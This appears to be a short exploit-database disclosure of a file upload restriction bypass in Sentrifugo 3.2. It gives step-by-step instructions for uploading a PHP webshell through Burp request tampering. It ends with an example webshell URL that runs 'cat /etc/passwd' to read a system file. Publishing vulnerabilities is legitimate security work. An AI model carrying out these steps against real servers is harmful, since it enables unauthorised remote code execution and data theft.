Exploits / Vulnerability Discovered : 2019-08-30 |
Type : webapps |
Platform : php
This exploit / vulnerability Sentrifugo 3.2 file upload restriction bypass is for educational purposes only and if it is used you will do on your own risk!
Multiple File Upload Restriction Bypass vulnerabilities were found in Sentrifugo 3.2. This allows for an authenticated user to potentially obtain RCE via webshell.
1. Self Service >> My Details >> Documents >> add New Document (/sentrifugo/index.php/mydetails/documents)
2. Turn Burp Intercept On
3. Select webshell with valid extension - ex: shell.php.doc
4. Alter request in the upload...
Update 'filename' to desired extension. ex: shell.php
Change content type to 'application/x-httpd-php'
5. With intercept still on, Save the document and copy the 'file_new_names' parmeter from the new POST request.
6. Append above saved parameter and visit your new webshell
Ex: http://10.42.1.42/sentrifugo/public/uploads/employeedocs/1565996140_5_shell.php?cmd=cat /etc/passwd